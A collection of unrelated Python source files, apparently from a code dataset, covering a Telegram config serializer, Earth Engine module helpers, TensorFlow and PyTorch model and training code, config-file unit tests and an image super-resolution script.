results[Address.IPv6] = {Protocol.Tcp: [], Protocol.Http: []} # type: ignore
for endpoint in endpoints:
if dcId == 0 or endpoint.id == dcId:
flags = endpoint.flags
address = Address.IPv6 if (flags & Flag.f_ipv6) else Address.IPv4
results[address][Protocol.Tcp].append(endpoint) # type: ignore
if not (flags & (Flag.f_tcpo_only | Flag.f_secret)):
results[address][Protocol.Http].append(endpoint) # type: ignore
return results
def Serialize(self) -> QByteArray:
options = self._dcOptions.Serialize()
size = sizeof(int32) * 2
size += td.Serialize.bytearraySize(options)
size += 28 * sizeof(int32)
size += td.Serialize.stringSize(self._fields.internalLinksDomain)
size += td.Serialize.stringSize(self._fields.txtDomainString)
result = QByteArray()
stream = QDataStream(result, QIODevice.OpenModeFlag.WriteOnly)
stream.setVersion(QDataStream.Version.Qt_5_1)
stream.writeInt32(MTP.Config.kVersion)
stream.writeInt32(
MTP.Environment.Test
if self._dcOptions.isTestMode()
else MTP.Environment.Production
)
stream << options
stream.writeInt32(self._fields.chatSizeMax)
stream.writeInt32(self._fields.megagroupSizeMax)
stream.writeInt32(self._fields.forwardedCountMax)
stream.writeInt32(self._fields.onlineUpdatePeriod)
stream.writeInt32(self._fields.offlineBlurTimeout)
stream.writeInt32(self._fields.offlineIdleTimeout)
stream.writeInt32(self._fields.onlineFocusTimeout)
stream.writeInt32(self._fields.onlineCloudTimeout)
stream.writeInt32(self._fields.notifyCloudDelay)
stream.writeInt32(self._fields.notifyDefaultDelay)
stream.writeInt32(self._fields.savedGifsLimit)
stream.writeInt32(self._fields.editTimeLimit)
stream.writeInt32(self._fields.revokeTimeLimit)
stream.writeInt32(self._fields.revokePrivateTimeLimit)
stream.writeInt32(1 if self._fields.revokePrivateInbox else 0)
stream.writeInt32(self._fields.stickersRecentLimit)
stream.writeInt32(self._fields.stickersFavedLimit)
stream.writeInt32(self._fields.pinnedDialogsCountMax)
stream.writeInt32(self._fields.pinnedDialogsInFolderMax)
stream.writeQString(self._fields.internalLinksDomain)
# stream << self._fields.internalLinksDomain
stream.writeInt32(self._fields.channelsReadMediaPeriod)
stream.writeInt32(self._fields.callReceiveTimeoutMs)
stream.writeInt32(self._fields.callRingTimeoutMs)
stream.writeInt32(self._fields.callConnectTimeoutMs)
stream.writeInt32(self._fields.callPacketTimeoutMs)
stream.writeInt32(self._fields.webFileDcId)
stream.writeQString(self._fields.txtDomainString)
# stream << self._fields.txtDomainString
stream.writeInt32(1 if self._fields.phoneCallsEnabled else 0)
stream.writeInt32(1 if self._fields.blockedMode else 0)
stream.writeInt32(self._fields.captionLengthMax)
return result
@staticmethod
def FromSerialized(serialized: QByteArray) -> MTP.Config:
stream = QDataStream(serialized)
stream.setVersion(QDataStream.Version.Qt_5_1)
version = stream.readInt32()
Expects(
version == MTP.Config.kVersion,
"version != kVersion, something went wrong",
)
            environment = MTP.Environment(stream.readInt32())
            result = MTP.Config(environment)
def read(field: _T) -> _T:
vtype = type(field)
if vtype == int:
return stream.readInt32() # type: ignore
elif vtype == bool:
return stream.readInt32() == 1 # type: ignore
elif vtype == str:
return stream.readQString() # type: ignore
raise ValueError()
dcOptionsSerialized = QByteArray()
stream >> dcOptionsSerialized
            fields = result._fields
            fields.chatSizeMax = read(fields.chatSizeMax)
            fields.megagroupSizeMax = read(fields.megagroupSizeMax)
            fields.forwardedCountMax = read(fields.forwardedCountMax)
            fields.onlineUpdatePeriod = read(fields.onlineUpdatePeriod)
            fields.offlineBlurTimeout = read(fields.offlineBlurTimeout)
            fields.offlineIdleTimeout = read(fields.offlineIdleTimeout)
            fields.onlineFocusTimeout = read(fields.onlineFocusTimeout)
            fields.onlineCloudTimeout = read(fields.onlineCloudTimeout)
            fields.notifyCloudDelay = read(fields.notifyCloudDelay)
            fields.notifyDefaultDelay = read(fields.notifyDefaultDelay)
            fields.savedGifsLimit = read(fields.savedGifsLimit)
            fields.editTimeLimit = read(fields.editTimeLimit)
            fields.revokeTimeLimit = read(fields.revokeTimeLimit)
            fields.revokePrivateTimeLimit = read(fields.revokePrivateTimeLimit)
            fields.revokePrivateInbox = read(fields.revokePrivateInbox)
            fields.stickersRecentLimit = read(fields.stickersRecentLimit)
            fields.stickersFavedLimit = read(fields.stickersFavedLimit)
            fields.pinnedDialogsCountMax = read(fields.pinnedDialogsCountMax)
            fields.pinnedDialogsInFolderMax = read(fields.pinnedDialogsInFolderMax)
            fields.internalLinksDomain = read(fields.internalLinksDomain)
            fields.channelsReadMediaPeriod = read(fields.channelsReadMediaPeriod)
            fields.callReceiveTimeoutMs = read(fields.callReceiveTimeoutMs)
            fields.callRingTimeoutMs = read(fields.callRingTimeoutMs)
            fields.callConnectTimeoutMs = read(fields.callConnectTimeoutMs)
            fields.callPacketTimeoutMs = read(fields.callPacketTimeoutMs)
            fields.webFileDcId = read(fields.webFileDcId)
            fields.txtDomainString = read(fields.txtDomainString)
            fields.phoneCallsEnabled = read(fields.phoneCallsEnabled)
            fields.blockedMode = read(fields.blockedMode)
            fields.captionLengthMax = read(fields.captionLengthMax)
ExpectStreamStatus(stream, "Could not stream MtpData serialized")
result._dcOptions.constructFromSerialized(dcOptionsSerialized)
return result
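# Round-trip sketch (assumes the Qt-based stream helpers imported via .configs
# are available at runtime):
if __name__ == "__main__":
    cfg = MTP.Config(MTP.Environment.Test)
    restored = MTP.Config.FromSerialized(cfg.Serialize())
    print(restored._fields.webFileDcId)  # 2 in the test environment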
|
11557439
|
import ee
from ee_extra.JavaScript.install import install as ee_install
from ee_extra.JavaScript.install import uninstall as ee_uninstall
from ee_extra.JavaScript.main import ee_require
from .extending import extend
@extend(ee)
def require(module):
"""Loads and executes a JavaScript GEE module.
All modules must be first installed before requiring them. After requiring the module,
it can be used in the same way as it is used in the Code Editor.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
Returns
-------
BoxDict
Loaded module. Methods and attributes can be accessed using dot notation.
See Also
--------
install : Installs a JavaScript GEE module.
uninstall : Uninstalls a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> LandsatLST = ee.require("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_require(module)
@extend(ee)
def install(module, update=False, quiet=False):
"""Installs a JavaScript GEE module.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
update : bool, default = False
Whether to update the module if it is already installed.
quiet : bool, default = False
Whether to show in console the process.
Returns
-------
None
See Also
--------
uninstall : Uninstalls a JavaScript GEE module.
require : Loads and executes a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> ee.install("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_install(module, update, quiet)
@extend(ee)
def uninstall(module, quiet=False):
"""Uninstalls a JavaScript GEE module.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
quiet : bool, default = False
Whether to show in console the process.
Returns
-------
None
See Also
--------
install : Installs a JavaScript GEE module.
require : Loads and executes a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> ee.uninstall("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_uninstall(module, quiet)
|
11557486
|
from typing import Dict, Any, List
import tensorflow as tf
from utils import MLP
from .sparse_graph_model import Sparse_Graph_Model
from tasks import Sparse_Graph_Task
from gnns import sparse_gnn_edge_mlp_layer
class No_Struct_MLP_Model(Sparse_Graph_Model):
@classmethod
def default_params(cls):
params = super().default_params()
params.update({
'max_nodes_in_batch': 25000,
'hidden_size': 128,
"graph_activation_function": "gelu",
"message_aggregation_function": "sum",
'graph_inter_layer_norm': True,
'use_target_state_as_input': True,
'num_edge_hidden_layers': 0,
})
return params
@staticmethod
def name(params: Dict[str, Any]) -> str:
return "NoStruct-MLP%i" % (params['num_edge_hidden_layers'])
def __init__(self, params: Dict[str, Any], task: Sparse_Graph_Task, run_id: str, result_dir: str) -> None:
super().__init__(params, task, run_id, result_dir)
def _apply_gnn_layer(self,
node_representations: tf.Tensor,
adjacency_lists: List[tf.Tensor],
type_to_num_incoming_edges: tf.Tensor,
num_timesteps: int
) -> tf.Tensor:
graph_to_nodes = self._Sparse_Graph_Model__placeholders['graph_to_nodes']
graph_nodes_list = self._Sparse_Graph_Model__placeholders['graph_nodes_list'] # (None, )
max_nodes = tf.shape(graph_to_nodes)[1]
tiled_nodes = tf.tile(tf.expand_dims(graph_to_nodes, axis=-1), (1, 1, max_nodes))
pairs = tf.concat(
[tf.expand_dims(tiled_nodes, axis=-1), tf.expand_dims(tf.transpose(tiled_nodes, [0, 2, 1]), axis=-1)],
axis=-1)
flat_pairs = tf.reshape(pairs, [-1, 2])
relevant_edges = tf.reshape(tf.gather(flat_pairs, tf.where(tf.reduce_min(flat_pairs, axis=-1) >= 0)), [-1, 2])
num_types = tf.shape(type_to_num_incoming_edges)[0]
num_nodes_in_graph = tf.reduce_sum(tf.cast(tf.greater(graph_to_nodes, -1), dtype=tf.float32), axis=-1)
num_incoming_nodes_per_node = tf.gather(params=num_nodes_in_graph, indices=graph_nodes_list)
type_to_num_incoming_edges = tf.tile(tf.expand_dims(num_incoming_nodes_per_node, axis=0), [num_types, 1])
return sparse_gnn_edge_mlp_layer(
node_embeddings=node_representations,
adjacency_lists=[relevant_edges for _ in adjacency_lists],
type_to_num_incoming_edges=type_to_num_incoming_edges,
state_dim=self.params['hidden_size'],
num_timesteps=num_timesteps,
activation_function=self.params['graph_activation_function'],
message_aggregation_function=self.params['message_aggregation_function'],
use_target_state_as_input=self.params['use_target_state_as_input'],
num_edge_hidden_layers=self.params['num_edge_hidden_layers'],
)
|
11557502
|
import tensorflow as tf
class Inception(tf.keras.layers.Layer):
def __init__(self, c1, c2, c3, c4):
super().__init__()
        # Branch 1: a single 1 x 1 convolution layer
self.p1_1 = tf.keras.layers.Conv2D(c1, kernel_size=1, activation='relu', padding='same')
        # Branch 2: 1 x 1 convolution followed by a 3 x 3 convolution
self.p2_1 = tf.keras.layers.Conv2D(c2[0], kernel_size=1, padding='same', activation='relu')
self.p2_2 = tf.keras.layers.Conv2D(c2[1], kernel_size=3, padding='same',
activation='relu')
        # Branch 3: 1 x 1 convolution followed by a 5 x 5 convolution
self.p3_1 = tf.keras.layers.Conv2D(c3[0], kernel_size=1, padding='same', activation='relu')
self.p3_2 = tf.keras.layers.Conv2D(c3[1], kernel_size=5, padding='same',
activation='relu')
        # Branch 4: 3 x 3 max pooling followed by a 1 x 1 convolution
self.p4_1 = tf.keras.layers.MaxPool2D(pool_size=3, padding='same', strides=1)
self.p4_2 = tf.keras.layers.Conv2D(c4, kernel_size=1, padding='same', activation='relu')
def call(self, x):
p1 = self.p1_1(x)
p2 = self.p2_2(self.p2_1(x))
p3 = self.p3_2(self.p3_1(x))
p4 = self.p4_2(self.p4_1(x))
        return tf.concat([p1, p2, p3, p4], axis=-1)  # concatenate the outputs along the channel dimension
def build_googlenet():
b1 = tf.keras.models.Sequential()
b1.add(tf.keras.layers.Conv2D(64, kernel_size=7, strides=2, padding='same', activation='relu'))
b1.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b2 = tf.keras.models.Sequential()
b2.add(tf.keras.layers.Conv2D(64, kernel_size=1, padding='same', activation='relu'))
b2.add(tf.keras.layers.Conv2D(192, kernel_size=3, padding='same', activation='relu'))
b2.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b3 = tf.keras.models.Sequential()
b3.add(Inception(64, (96, 128), (16, 32), 32))
b3.add(Inception(128, (128, 192), (32, 96), 64))
b3.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b4 = tf.keras.models.Sequential()
b4.add(Inception(192, (96, 208), (16, 48), 64))
b4.add(Inception(160, (112, 224), (24, 64), 64))
b4.add(Inception(128, (128, 256), (24, 64), 64))
b4.add(Inception(112, (144, 288), (32, 64), 64))
b4.add(Inception(256, (160, 320), (32, 128), 128))
b4.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b5 = tf.keras.models.Sequential()
b5.add(Inception(256, (160, 320), (32, 128), 128))
b5.add(Inception(384, (192, 384), (48, 128), 128))
b5.add(tf.keras.layers.GlobalAvgPool2D())
net = tf.keras.models.Sequential([b1, b2, b3, b4, b5, tf.keras.layers.Dense(10,activation='softmax')])
return net
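# A minimal usage sketch (the 96 x 96 single-channel input is an assumption,
# e.g. Fashion-MNIST resized; any spatial size that survives the five
# stride-2 poolings works):
#
#     net = build_googlenet()
#     x = tf.random.normal((1, 96, 96, 1))
#     print(net(x).shape)  # (1, 10)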
|
11557505
|
import json
import os
import yaml
import tempfile
from unittest import TestCase
from conman.conman_file import ConManFile
def _make_config_file(file_type, content):
# create temp filename
f = tempfile.NamedTemporaryFile(suffix=file_type, delete=False)
# write content
f.write(content.encode('utf-8'))
# return filename
return f.name
def _make_ini_file(valid, extension=None):
valid_text = '[ini_conf]\nkey = value\n'
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.ini'
return _make_config_file(file_type, content)
def _make_json_file(valid, extension=None):
valid_text = json.dumps(dict(json_conf=dict(key='value')))
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.json'
return _make_config_file(file_type, content)
def _make_yaml_file(valid, extension=None):
valid_text = yaml.dump(dict(
root_key='root_value',
yaml_conf=dict(key='value')))
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.yaml'
return _make_config_file(file_type, content)
class ConmanFileTest(TestCase):
@classmethod
def setUpClass(cls):
cls._good_files = {}
cls._good_files['ini'] = _make_ini_file(True)
cls._good_files['json'] = _make_json_file(True)
cls._good_files['yaml'] = _make_yaml_file(True, extension='.txt')
cls._bad_files = {}
cls._bad_files['ini'] = _make_ini_file(False)
cls._bad_files['json'] = _make_json_file(False)
cls._bad_files['yaml'] = _make_yaml_file(False)
cls._all_files = list(cls._good_files.values()) + \
list(cls._bad_files.values())
@classmethod
def tearDownClass(cls):
for f in cls._all_files:
os.remove(f)
def setUp(self):
self.conman = ConManFile()
def tearDown(self):
pass
def test_guess_file_type(self):
f = self.conman._guess_file_type
self.assertEqual('json', f('x.json'))
self.assertEqual('yaml', f('x.yml'))
self.assertEqual('yaml', f('x.yaml'))
self.assertEqual('ini', f('x.ini'))
self.assertIsNone(f('x.no_such_ext'))
def test_init_no_files(self):
self.assertDictEqual({}, self.conman._conf)
def test_init_some_good_files(self):
c = ConManFile(self._good_files.values())
expected = dict(root_key='root_value',
json_conf=dict(key='value'),
yaml_conf=dict(key='value'),
ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_init_some_bad_files(self):
some_bad_files = self._all_files
self.assertRaises(Exception, ConManFile, some_bad_files)
def test_add_config_file_simple_with_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='ini')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_guess_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'])
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_wrong_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='json')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_unknown_wrong_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='asdf')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_from_env_var(self):
os.environ['good_config'] = self._good_files['yaml']
c = ConManFile()
c.add_config_file(env_variable='good_config')
expected = dict(root_key='root_value',
yaml_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_with_base_dir(self):
filename = self._good_files['json']
base_dir, base_name = os.path.split(filename)
c = ConManFile()
c.add_config_file(filename=base_name, base_dir=base_dir)
expected = dict(json_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_dictionary_access(self):
c = ConManFile(self._good_files.values())
self.assertEqual('root_value', c['root_key'])
|
11557517
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='TxtOrg',
version='1.0.0',
author='<NAME>, <NAME>, <NAME>',
author_email='<EMAIL>',
packages=['textorganizer'],
scripts=['bin/txtorg'],
license='LICENSE.txt',
description='Tool to make organizing data for textual analysis easy and scalable',
install_requires=['whoosh','chardet', 'snownlp'],
)
|
11557521
|
import time
import torch.autograd
import torch.nn as nn
from core.label_smooth import LabelSmoothCrossEntropyLoss
from core.utils import *
from core.warmup_scheduler import GradualWarmupScheduler
class View(nn.Module):
"""
Reshape data from 4 dimension to 2 dimension
"""
def forward(self, x):
assert x.dim() == 2 or x.dim() == 4, "invalid dimension of input {:d}".format(
x.dim()
)
if x.dim() == 4:
out = x.view(x.size(0), -1)
else:
out = x
return out
class Trainer(object):
"""
Trainer
"""
def __init__(
self,
model,
device,
train_loader,
val_loader,
settings,
logger,
tensorboard_logger,
optimizer_state=None,
lr_scheduler_state=None,
run_count=0,
**kwargs
):
self.settings = settings
self.device = device
self.model = model
self.model = self.model.to(self.device)
self.train_loader = train_loader
self.val_loader = val_loader
self.logger = logger
self.tensorboard_logger = tensorboard_logger
self.run_count = run_count
if self.settings.label_smooth > 0:
self.criterion = LabelSmoothCrossEntropyLoss(
num_classes=self.settings.n_classes
)
else:
self.criterion = nn.CrossEntropyLoss()
self.lr = self.settings.lr
params = self.model.parameters()
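        # When no_decay_keys is set, build one parameter group per tensor so
        # that matching parameters (e.g. biases, norm layers) get zero weight decay.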
if len(self.settings.no_decay_keys) != 0:
params = []
for name, param in self.model.named_parameters():
flag = False
for key in self.settings.no_decay_keys:
if key in name:
flag = True
break
if flag:
weight_decay = 0
else:
weight_decay = self.settings.weight_decay
params.append(
{
"params": param,
"lr": self.settings.lr,
"weight_decay": weight_decay,
}
)
if "SGD" in self.settings.opt_type:
self.optimizer = torch.optim.SGD(
params=params,
lr=self.settings.lr,
momentum=self.settings.momentum,
weight_decay=self.settings.weight_decay,
nesterov=True,
)
elif "RMSProp" in self.settings.opt_type:
self.optimizer = torch.optim.RMSprop(
params=params,
lr=self.settings.lr,
alpha=self.settings.alpha,
eps=self.settings.eps,
weight_decay=self.settings.weight_decay,
momentum=self.settings.momentum,
)
elif "AdamW" in self.settings.opt_type:
self.optimizer = torch.optim.AdamW(
params=params,
lr=self.settings.lr,
weight_decay=self.settings.weight_decay,
)
elif "Adam" in self.settings.opt_type:
self.optimizer = torch.optim.Adam(
params=params,
lr=self.settings.lr,
weight_decay=self.settings.weight_decay,
)
self.logger.info(self.optimizer)
self.logger.info(self.criterion)
if optimizer_state is not None:
self.logger.info("Load optimizer state!")
self.optimizer.load_state_dict(optimizer_state)
if "cosine_warmup" in self.settings.lr_scheduler_type:
self.logger.info("Cosine Annealing Warmup LR!")
self.after_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
self.optimizer, self.settings.n_epochs - self.settings.warmup_n_epochs
)
self.scheduler = GradualWarmupScheduler(
self.optimizer, 1, self.settings.warmup_n_epochs, self.after_scheduler
)
elif "cosine" in self.settings.lr_scheduler_type:
self.logger.info("Cosine Annealing LR!")
self.scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
self.optimizer, self.settings.n_epochs
)
else:
self.logger.info("MultiStep LR!")
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(
self.optimizer, milestones=self.settings.step, gamma=0.1
)
if lr_scheduler_state is not None:
self.logger.info("Load lr state")
last_epoch = lr_scheduler_state["last_epoch"]
self.logger.info(self.scheduler.last_epoch)
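            # Fast-forward the scheduler to the saved epoch so the learning
            # rate resumes where the previous run left off.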
while self.scheduler.last_epoch < last_epoch:
self.scheduler.step()
        # Keep a handle to the bare model; DDP wrapping replaces self.model.
        self.model_without_ddp = self.model
        if self.settings.distributed:
            self.model = torch.nn.parallel.DistributedDataParallel(
                self.model, device_ids=[self.settings.gpu], find_unused_parameters=True
            )
            self.model_without_ddp = self.model.module
def backward(self, loss):
"""
backward propagation
"""
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
def get_lr(self):
for param_group in self.optimizer.param_groups:
self.lr = param_group["lr"]
break
def train(self, epoch):
"""
Train one epoch
:param epoch: index of epoch
"""
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
metric_logger.add_meter("lr", SmoothedValue(window_size=1, fmt="{value}"))
metric_logger.add_meter("img/s", SmoothedValue(window_size=10, fmt="{value}"))
self.model.train()
header = "Epoch: [{}]".format(epoch)
for image, target in metric_logger.log_every(
self.train_loader, self.settings.print_frequency, header
):
start_time = time.time()
image, target = image.to(self.device), target.to(self.device)
# forward
output = self.model(image)
loss = self.criterion(output, target)
# backward
self.backward(loss)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(
loss=loss.item(), lr=self.optimizer.param_groups[0]["lr"]
)
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
metric_logger.meters["img/s"].update(
batch_size / (time.time() - start_time)
)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
self.scheduler.step()
self.get_lr()
self.logger.info("Change Learning rate: {}".format(self.lr))
train_error = 100 - metric_logger.acc1.global_avg
train_loss = metric_logger.loss.global_avg
train5_error = 100 - metric_logger.acc5.global_avg
if self.tensorboard_logger is not None:
self.tensorboard_logger.add_scalar(
"train_top1_error", train_error, self.run_count
)
self.tensorboard_logger.add_scalar(
"train_top5_error", train5_error, self.run_count
)
self.tensorboard_logger.add_scalar("train_loss", train_loss, self.run_count)
self.tensorboard_logger.add_scalar("lr", self.lr, self.run_count)
self.logger.info(
"|===>Training Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
train_error, train_loss, train5_error
)
)
return train_error, train_loss, train5_error
def val(self, epoch):
"""
Validation
:param epoch: index of epoch
"""
self.model.eval()
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
header = "Test:"
with torch.no_grad():
for image, target in metric_logger.log_every(
self.val_loader, self.settings.print_frequency, header
):
image = image.to(self.device, non_blocking=True)
target = target.to(self.device, non_blocking=True)
# forward
output = self.model(image)
loss = self.criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(loss=loss.item())
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
val_error = 100 - metric_logger.acc1.global_avg
val_loss = metric_logger.loss.global_avg
val5_error = 100 - metric_logger.acc5.global_avg
if self.tensorboard_logger is not None:
self.tensorboard_logger.add_scalar(
"val_top1_error", val_error, self.run_count
)
self.tensorboard_logger.add_scalar(
"val_top5_error", val5_error, self.run_count
)
self.tensorboard_logger.add_scalar("val_loss", val_loss, self.run_count)
self.run_count += 1
self.logger.info(
"|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
val_error, val_loss, val5_error
)
)
return val_error, val_loss, val5_error
def val_without_tb(self, epoch):
"""
Validation
:param epoch: index of epoch
"""
self.model.eval()
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
header = "Test:"
with torch.no_grad():
for image, target in metric_logger.log_every(
self.val_loader, self.settings.print_frequency, header
):
image = image.to(self.device, non_blocking=True)
target = target.to(self.device, non_blocking=True)
# forward
output = self.model(image)
loss = self.criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(loss=loss.item())
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
val_error = 100 - metric_logger.acc1.global_avg
val_loss = metric_logger.loss.global_avg
val5_error = 100 - metric_logger.acc5.global_avg
self.logger.info(
"|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
val_error, val_loss, val5_error
)
)
return val_error, val_loss, val5_error
|
11557565
|
import os
import numpy as np
import cv2
import matplotlib.pyplot as plt
from scipy import misc  # misc.imread needs scipy < 1.2 (or swap in imageio.imread)
from tqdm import tqdm
from utils import is_image_file, mod_crop
from hashTable import hashTable
Qangle = 24
Qstrenth = 3
Qcoherence = 3
datasets = './datasets/General100/'
rate = 3
images_path = [os.path.join(datasets, x) for x in os.listdir(datasets) if is_image_file(x)]
print("Load dataset ", len(images_path))
H = np.load("filters.npy")
for image_path in tqdm(images_path):
    print("Test %s" % image_path)
    im = misc.imread(image_path, mode='YCbCr')
    lr = mod_crop(im, rate)
    y = lr[:, :, 0]  # luminance channel (an ndarray has no PIL-style split())
    h, w = y.shape
    # Cheap bilinear upscale, then refine patch by patch with the learned filters.
    LR = cv2.resize(y, (w * rate, h * rate), interpolation=cv2.INTER_LINEAR)
    LRDirect = np.zeros(LR.shape)
    for xP in range(5, LR.shape[0] - 6):
        for yP in range(5, LR.shape[1] - 6):
            patch = LR[xP - 5:xP + 6, yP - 5:yP + 6]
            [angle, strenth, coherence] = hashTable(patch, Qangle, Qstrenth, Qcoherence)
            j = angle * 9 + strenth * 3 + coherence
            A = patch.reshape(1, -1)
            t = xP % 2 * 2 + yP % 2
            hh = np.matrix(H[j, t])  # H holds the learned filters; h is the image height
            LRDirect[xP][yP] = hh * A.T
print("Test is off")
# Show the result
mat = cv2.imread("../train/a.jpg")
mat = cv2.cvtColor(mat, cv2.COLOR_BGR2YCrCb)
fig, axes = plt.subplots(ncols=2, figsize=(15, 10))
axes[0].imshow(cv2.cvtColor(mat, cv2.COLOR_YCrCb2RGB))
axes[0].set_title('ORIGIN')
LR = cv2.resize(mat, (0, 0), fx=2, fy=2)
LRDirectImage = LR
LRDirectImage[:, :, 2] = LRDirect
axes[1].imshow(cv2.cvtColor(LRDirectImage, cv2.COLOR_YCrCb2RGB))
axes[1].set_title('RAISR')
fig.savefig("../fig.png")
|
11557672
|
from tensorflow_functions import cosine_knn
import collections
import numpy as np
import logging
from embedding import load_embedding
import operator
from sklearn.cluster import KMeans
from utils import length_normalize, normalize_questions, normalize_vector, calculate_cosine_simil, perf_measure
import sklearn.metrics
import argparse
import os
import datetime
class Question_Manager():
questions = []
questions_normalized = []
questions_vectors = []
keywords = collections.defaultdict()
embedding = None
def __init__(self, embedding_path='/home/iker/Documents/QuestionCluster/TechEmbeddings/embeddings_lower.vec'):
self.questions = []
self.questions_normalized = []
self.questions_vectors = []
self.keywords = collections.defaultdict()
self.embedding = load_embedding(embedding_path)
def get_keywords(self):
return sorted(self.keywords.items(), key=operator.itemgetter(1), reverse=True)
def question_to_vector(self, question, prefix=False):
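        # Average the embeddings of all in-vocabulary words; unknown words are
        # skipped, and an optional prefix namespaces the lookup key.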
sentence = np.zeros([self.embedding.dims])
num_words = 0
for word in question:
try:
if prefix:
sentence += self.embedding.word_to_vector(prefix+'/'+word)
else:
sentence += self.embedding.word_to_vector(word)
num_words += 1
except KeyError as r:
continue
if num_words > 0:
sentence = sentence / num_words
else:
            logging.warning('Could not calculate the sentence embedding for the sentence ' + str(question))
return sentence
def update_keyword_for_sentence(self, question):
for word in question:
try:
self.keywords[word] += 1
except KeyError as er:
self.keywords[word] = 1
def print_question(self, question, path='questions.txt'):
with open(path, 'a') as file:
print(str(question), file=file)
def add_question(self, question):
normalized_question = normalize_questions(question)
question_vector = self.question_to_vector(normalized_question)
if len(normalized_question) > 0 and question_vector is not None:
self.questions.append(question)
self.questions_normalized.append(normalized_question)
self.questions_vectors.append(question_vector)
self.update_keyword_for_sentence(normalized_question)
self.print_question(question)
    def load_from_file(self, path):
with open(path, 'r') as file:
for line in file:
self.add_question(line)
def clustering(self, n_clusters=8):
kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(np.array(self.questions_vectors))
cluster_centers = kmeans.cluster_centers_
labels = kmeans.labels_
questions_cluster = [[] for x in range(n_clusters)]
for i_label, label in enumerate(kmeans.predict(np.array(self.questions_vectors))):
questions_cluster[label].append(self.questions[i_label])
return questions_cluster
def k_nearest(self, sentence, k=1):
vectors_norm = length_normalize(np.array(self.questions_vectors))
result = cosine_knn([self.question_to_vector(normalize_questions(sentence))], vectors_norm, k=k)
for s in result[0]:
print(self.questions[s])
    def evaluate_similarity(self, question_file, threshold=0.8, prefix=False):
question1 = []
question2 = []
gold_scores = []
with open(question_file) as file:
for line in file:
line = line.rstrip()
q1, q2, gold = line.split('\t')
question1.append(q1)
question2.append(q2)
gold_scores.append(int(gold))
question_vectors_1 = [self.question_to_vector(normalize_questions(x),prefix) for x in question1]
question_vectors_2 = [self.question_to_vector(normalize_questions(x), prefix) for x in question2]
scores = []
for i in range(len(question_vectors_1)):
if i % 10 == 0:
string = "<" + str(datetime.datetime.now()) + "> " + 'Evaluating Question Pairs: ' + str(
int(100 * ((i+10) / len(question_vectors_1)))) + '%'
print(string, end="\r")
score = calculate_cosine_simil(question_vectors_1[i], question_vectors_2[i])
if score > threshold:
scores.append(1)
else:
scores.append(0)
print()
